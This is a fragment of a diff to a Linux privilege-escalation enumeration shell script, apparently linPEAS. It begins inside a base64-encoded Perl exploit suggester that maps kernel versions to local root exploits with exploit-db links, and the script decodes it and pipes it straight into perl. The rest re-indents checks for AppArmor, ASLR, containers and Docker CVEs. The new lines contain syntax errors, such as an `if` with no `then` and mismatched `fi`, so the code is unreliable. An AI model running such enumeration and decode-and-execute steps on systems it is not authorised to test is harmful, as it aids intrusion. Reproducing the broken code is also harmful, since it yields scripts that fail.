zIwMTAtNDA3MycsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE3Nzg3JywKICAgIH0sCiAgICAnY2Fwc190b19yb290JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicgXSwKICAgICAgICBjdmUgID0+ICduL2EnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTkxNicsCiAgICB9LAogICAgJ2FtZXJpY2FuLXNpZ24tbGFuZ3VhZ2UnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4wJywgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLAogICAgICAgICAgICAnMi42LjYnLCAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLAogICAgICAgICAgICAnMi42LjEyJywgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLAogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxMC00MzQ3JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuc2VjdXJpdHlmb2N1cy5jb20vYmlkLzQ1NDA4JywKICAgIH0sCiAgICAncGt0Y2R2ZCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjAnLCAgJzIuNi4xJywgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsCiAgICAgICAgICAgICcyLjYuNicsICAnMi42LjcnLCAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsCiAgICAgICAgICAgICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsCiAgICAgICAgICAgICcyLjYuMzYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDEwLTM0MzcnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTE1MCcsCiAgICB9LAogICAgJ3ZpZGVvNGxpbnV4JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMCcsICAnMi42LjEnLCAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywKICAgICAgICAgICAgJzIuNi42JywgICcyLjYuNycsICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywKICAgICAgICAgICAgJzIuNi4xMicsICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywKICAgICAgICAgICAgJzIuNi4xOCcsICcyLjYuMTknLCAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywKICAgICAgICAgICAgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTAtMzA4MScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE1MDI0JywKICAgIH0sCiAgICAnbWVtb2RpcHBlcicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjM5JywgJzMuMC4wJywgJzMuMC4xJywgJzMuMC4yJywgJzMuMC4zJywgJzMuMC40JywKICAgICAgICAgICAgJzMuMC41JywgICczLjAuNicsICczLjEuMCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTItMDA1NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE4NDExJywKICAgIH0sCiAgICAnc2VtdGV4JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMzcnLCAnMi42LjM4JywgJzIuNi4zOScsICczLjAuMCcsICczLjAuMScsICczLjAuMicsCiAgICAgICAgICAgICczLjAuMycsICAnMy4wLjQnLCAgJzMuMC41JywgICczLjAuNicsICczLjEuMCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTMtMjA5NCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzI1NDQ0JywKICAgIH0sCiAgICAncGVyZl9zd2V2ZW50JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICczLjAuMCcsICczLjAuMScsICczLjAuMicsICczLjAuMycsICczLjAuNCcsICczLjAuNScsCiAgICAgICAgICAgICczLjAuNicsICczLjEuMCcsICczLjIuMCcsICczLjMuMCcsICczLjQuMCcsICczLjQuMScsCiAgICAgICAgICAgICczLjQuMicsICczLjQuMycsICczLjQuNCcsICczLjQuNScsICczLjQuNicsICczLjQuOCcsCiAgICAgICAgICAgICczLjQuOScsICczLjUuMCcsICczLjYuMCcsICczLjcuMCcsICczLjguMCcsICczLjguMScsCiAgICAgICAgICAgICczLjguMicsICczLjguMycsICczLjguNCcsICczLjguNScsICczLjguNicsICczLjguNycsCiAgICAgICAgICAgICczLjguOCcsICczLjguOScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTMtMjA5NCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzI2MTMxJywKICAgIH0sCiAgICAnbXNyJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI3JywgJzIuNi4yOCcsCiAgICAgICAgICAgICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsCiAgICAgICAgICAgICcyLjYuMzUnLCAnMi42LjM2JywgJzIuNi4zNycsICcyLjYuMzgnLCAnMi42LjM5JywgJzMuMC4wJywKICAgICAgICAgICAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywgICczLjAuNScsICAnMy4wLjYnLAogICAgICAgICAgICAnMy4xLjAnLCAgJzMuMi4wJywgICczLjMuMCcsICAnMy40LjAnLCAgJzMuNS4wJywgICczLjYuMCcsCiAgICAgICAgICAgICczLjcuMCcsICAnMy43LjYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDEzLTAyNjgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yNzI5NycsCiAgICB9LAogICAgJ3RpbWVvdXRwd24nID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzMuNC4wJywgICczLjUuMCcsICAnMy42LjAnLCAgJzMuNy4wJywgICczLjguMCcsICAnMy44LjknLCAKICAgICAgICAgICAgJzMuOS4wJywgICczLjEwLjAnLCAnMy4xMS4wJywgJzMuMTIuMCcsICczLjEzLjAnLCAnMy40LjAnLAogICAgICAgICAgICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy44LjAnLCAgJzMuOC41JywgICczLjguNicsICAKICAgICAgICAgICAgJzMuOC45JywgICczLjkuMCcsICAnMy45LjYnLCAgJzMuMTAuMCcsICczLjEwLjYnLCAnMy4xMS4wJywKICAgICAgICAgICAgJzMuMTIuMCcsICczLjEzLjAnLCAnMy4xMy4xJwogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDE0LTAwMzgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8zMTM0NicsCiAgICB9LAogICAgJ3Jhd21vZGVQVFknID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLCAnMi42LjM2JywKICAgICAgICAgICAgJzIuNi4zNycsICcyLjYuMzgnLCAnMi42LjM5JywgJzMuMTQuMCcsICczLjE1LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTQtMDE5NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vcGFja2V0c3Rvcm1zZWN1cml0eS5jb20vZmlsZXMvZG93bmxvYWQvMTI2NjAzL2N2ZS0yMDE0LTAxOTYtbWQuYycsCiAgICB9LAogICAgJ292ZXJsYXlmcycgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMy4xMy4wJywgJzMuMTYuMCcsICczLjE5LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTUtODY2MCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzM5MjMwJywKICAgIH0sCiAgICAncHBfa2V5JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCgkJCSczLjQuMCcsICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy44LjAnLCAgJzMuOC4xJywgIAogICAgICAgICAgICAnMy44LjInLCAgJzMuOC4zJywgICczLjguNCcsICAnMy44LjUnLCAgJzMuOC42JywgICczLjguNycsICAKICAgICAgICAgICAgJzMuOC44JywgICczLjguOScsICAnMy45LjAnLCAgJzMuOS42JywgICczLjEwLjAnLCAnMy4xMC42JywgCiAgICAgICAgICAgICczLjExLjAnLCAnMy4xMi4wJywgJzMuMTMuMCcsICczLjEzLjEnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTYtMDcyOCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzM5Mjc3JywKICAgIH0sCiAgICAnZGlydHlfY293JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsIAoJCQknMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAKICAgICAgICAgICAgJzIuNi4zMycsICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicsICcyLjYuMzcnLCAnMi42LjM4JywgCiAgICAgICAgICAgICcyLjYuMzknLCAnMy4wLjAnLCAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywgIAogICAgICAgICAgICAnMy4wLjUnLCAgJzMuMC42JywgICczLjEuMCcsICAnMy4yLjAnLCAgJzMuMy4wJywgICczLjQuMCcsICAKICAgICAgICAgICAgJzMuNS4wJywgICczLjYuMCcsICAnMy43LjAnLCAgJzMuNy42JywgICczLjguMCcsICAnMy45LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTYtNTE5NScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzQwNjE2JywKICAgIH0sCiAgICAnYWZfcGFja2V0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzQuNC4wJyBdLAogICAgICAgIGN2ZSA9PiAnMjAxNi04NjU1JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDA4NzEnLAogICAgfSwKICAgICdwYWNrZXRfc2V0X3JpbmcnID0+IHsKICAgICAgICB2dWxuID0+IFsnNC44LjAnIF0sCiAgICAgICAgY3ZlID0+ICcyMDE3LTczMDgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy80MTk5NCcsCiAgICB9LAogICAgJ2Nsb25lX25ld3VzZXInID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzMuMy41JywgJzMuMy40JywgJzMuMy4yJywgJzMuMi4xMycsICczLjIuOScsICczLjIuMScsIAogICAgICAgICAgICAnMy4xLjgnLCAnMy4wLjUnLCAnMy4wLjQnLCAnMy4wLjInLCAnMy4wLjEnLCAnMy4yJywgJzMuMC4xJywgJzMuMCcKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnTlxBJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMzgzOTAnLAogICAgfSwKICAgICdnZXRfcmVrdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnNC40LjAnLCAnNC44LjAnLCAnNC4xMC4wJywgJzQuMTMuMCcKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxNy0xNjY5NScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzQ1MDEwJywKICAgIH0sCiAgICAnZXhwbG9pdF94JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsCiAgICAgICAgICAgICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsCiAgICAgICAgICAgICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsICcyLjYuMzYnLCAnMi42LjM3JywgJzIuNi4zOCcsCiAgICAgICAgICAgICcyLjYuMzknLCAnMy4wLjAnLCAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywKICAgICAgICAgICAgJzMuMC41JywgICczLjAuNicsICAnMy4xLjAnLCAgJzMuMi4wJywgICczLjMuMCcsICAnMy40LjAnLAogICAgICAgICAgICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy43LjYnLCAgJzMuOC4wJywgICczLjkuMCcsCiAgICAgICAgICAgICczLjEwLjAnLCAnMy4xMS4wJywgJzMuMTIuMCcsICczLjEzLjAnLCAnMy4xNC4wJywgJzMuMTUuMCcsCiAgICAgICAgICAgICczLjE2LjAnLCAnMy4xNy4wJywgJzMuMTguMCcsICczLjE5LjAnLCAnNC4wLjAnLCAgJzQuMS4wJywKICAgICAgICAgICAgJzQuMi4wJywgICc0LjMuMCcsICAnNC40LjAnLCAgJzQuNS4wJywgICc0LjYuMCcsICAnNC43LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTgtMTQ2NjUnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy80NTY5NycsCiAgICB9LAogICk7Cn0KCl9fRU5EX18KPWhlYWQxIE5BTUUKCmxpbnV4X2V4cGxvaXRfc3VnZ2VzdGVyLTIucGwgLSBBIGxvY2FsIGV4cGxvaXQgc3VnZ2VzdGVyIGZvciBsaW51eAoKPWhlYWQxIERFU0NSSVBUSU9OCgpUaGlzIHBlcmwgc2NyaXB0IHdpbGwgZW51bWVyYXRlIHRoZSBwb3NzaWJsZSBleHBsb2l0cyBhdmFpbGFibGUgZm9yIGEgZ2l2ZW4ga2VybmVsIHZlcnNpb24KCj1oZWFkMSBVU0FHRQoKWy1oXSBIZWxwICh0aGlzIG1lc3NhZ2UpClsta10gS2VybmVsIG51bWJlciAoZWcuIDIuNi4yOCkKWy1kXSBPcGVuIGV4cGxvaXQgZG93bmxvYWQgbWVudQoKWW91IGNhbiBhbHNvIHByb3ZpZGUgYSBwYXJ0aWFsIGtlcm5lbCB2ZXJzaW9uIChlZy4gMi40KQp0byBzZWUgYWxsIGV4cGxvaXRzIGF2YWlsYWJsZS4KCj1oZWFkMSBBVVRIT1IKCkpvbmF0aGFuIERvbmFzIChjKSAyMDE5Cgo9Y3V0Cgo9aGVhZDEgTElDRU5TRQoKIExpbnV4IEV4cGxvaXQgU3VnZ2VzdGVyIDIKCiBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQogaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkKIHRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb247IGVpdGhlciB2ZXJzaW9uIDIgb2YgdGhlIExpY2Vuc2UsIG9yCiAoYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9uLgoKIFRoaXMgcHJvZ3JhbSBpcyBkaXN0cmlidXRlZCBpbiB0aGUgaG9wZSB0aGF0IGl0IHdpbGwgYmUgdXNlZnVsLAogYnV0IFdJVEhPVVQgQU5ZIFdBUlJBTlRZOyB3aXRob3V0IGV2ZW4gdGhlIGltcGxpZWQgd2FycmFudHkgb2YKIE1FUkNIQU5UQUJJTElUWSBvciBGSVRORVNTIEZPUiBBIFBBUlRJQ1VMQVIgUFVSUE9TRS4gIFNlZSB0aGUKIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlIGZvciBtb3JlIGRldGFpbHMuCiAgICAgICAgCiBZb3Ugc2hvdWxkIGhhdmUgcmVjZWl2ZWQgYSBjb3B5IG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhbG9uZwogd2l0aCB0aGlzIHByb2dyYW07IGlmIG5vdCwgd3JpdGUgdG8gdGhlIEZyZWUgU29mdHdhcmUgRm91bmRhdGlvbiwgSW5jLiwKIDUxIEZyYW5rbGluIFN0cmVldCwgRmlmdGggRmxvb3IsIEJvc3RvbiwgTUEgMDIxMTAtMTMwMSBVU0EuCgo9Y3V0Cg==" echo $les2_b64 | base64 -d | perl echo "" - fi +fi - if [ "$(command -v brew 2>/dev/null)" ]; then +if [ "$(command -v brew 2>/dev/null)" ]; then print_2title "Brew Doctor Suggestions" brew doctor echo "" - fi +fi - #-- SY) AppArmor - print_2title "Protections" - print_list "AppArmor enabled? .............. "$NC - if [ "$(command -v aa-status 2>/dev/null)" ]; then +#-- SY) AppArmor +print_2title "Protections" +print_list "AppArmor enabled? .............. "$NC +if [ "$(command -v aa-status 2>/dev/null)" ]; then aa-status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then +elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then +elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then ls -d /etc/apparmor* - else +else echo_not_found "AppArmor" - fi +fi - #-- SY) grsecurity - print_list "grsecurity present? ............ "$NC - ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") +#-- SY) grsecurity +print_list "grsecurity present? ............ "$NC +( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") - #-- SY) PaX - print_list "PaX bins present? .............. "$NC - (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") +#-- SY) PaX +print_list "PaX bins present? .............. "$NC +(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") - #-- SY) Execshield - print_list "Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," +#-- SY) Execshield +print_list "Execshield enabled? ............ "$NC +(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," - #-- SY) SElinux - print_list "SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," +#-- SY) SElinux +print_list "SELinux enabled? ............... "$NC +(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - #-- SY) Gatekeeper - if [ "$MACPEAS" ]; then +#-- SY) Gatekeeper +if [ "$MACPEAS" ]; then print_list "Gatekeeper enabled? .......... "$NC (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - + print_list "sleepimage encrypted? ........ "$NC (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no @@ -1395,1045 +1407,995 @@ if echo $CHECKS | grep -q SysI; then print_list "Connected to AD? ............. "$NC dsconfigad -show && echo "" || echo_no - fi +fi - #-- SY) ASLR - print_list "Is ASLR enabled? ............... "$NC - ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) - if [ -z "$ASLR" ]; then +#-- SY) ASLR +print_list "Is ASLR enabled? ............... "$NC +ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) +if [ -z "$ASLR" ]; then echo_not_found "/proc/sys/kernel/randomize_va_space"; - else +else if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi echo "" - fi +fi - #-- SY) Printer - print_list "Printer? ....................... "$NC - (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null +#-- SY) Printer +print_list "Printer? ....................... "$NC +(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null - #-- SY) Running in a virtual environment - print_list "Is this a virtual machine? ..... "$NC - hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) - if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then +#-- SY) Running in a virtual environment +print_list "Is this a virtual machine? ..... "$NC +hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) +if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then detectedvirt=$(systemd-detect-virt) if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi - else +else if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi - fi - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q Container; then - ############################################## - #---------------) Containers (---------------# - ############################################## - print_title "Containers" - containerCheck +if echo $CHECKS | grep -q container; +print_title "Container" +############################################## +#---------------) Containers (---------------# +############################################## +containerCheck - print_2title "Container related tools present" - command -v "$CONTAINER_CMDS" +print_2title "Container related tools present" +command -v "$CONTAINER_CMDS" - print_2title "Container details" - print_list "Is this a container? ...........$NC $containerType" +print_2title "Container details" +print_list "Is this a container? ...........$NC $containerType" - print_list "Any running containers? ........ "$NC - # Get counts of running containers for each platform - dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) - podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) - lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) - rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then - echo_no - else - containerCounts="" - if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi - if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi - if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi - if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," - # List any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi - fi +print_list "Any running containers? ........ "$NC +# Get counts of running containers for each platform +dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) +podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) +lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) +rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) +if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then +echo_no +else +containerCounts="" +if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi +if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi +if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi +if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi +echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," +# List any running containers +if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi +if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi +fi - #If docker - if echo "$containerType" | grep -qi "docker"; then - print_2title "Docker Container details" - inDockerGroup - print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Looking and enumerating Docker Sockets\n"$NC - enumerateDockerSockets - print_list "Docker version .................$NC$dockerVersion" - checkDockerVersionExploits - print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," - fi - if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker - fi - fi +#If docker +if echo "$containerType" | grep -qi "docker"; then +print_2title "Docker Container details" +inDockerGroup +print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Looking and enumerating Docker Sockets\n"$NC +enumerateDockerSockets +print_list "Docker version .................$NC$dockerVersion" +checkDockerVersionExploits +print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +if [ "$inContainer" ]; then + checkDockerRootless + print_list 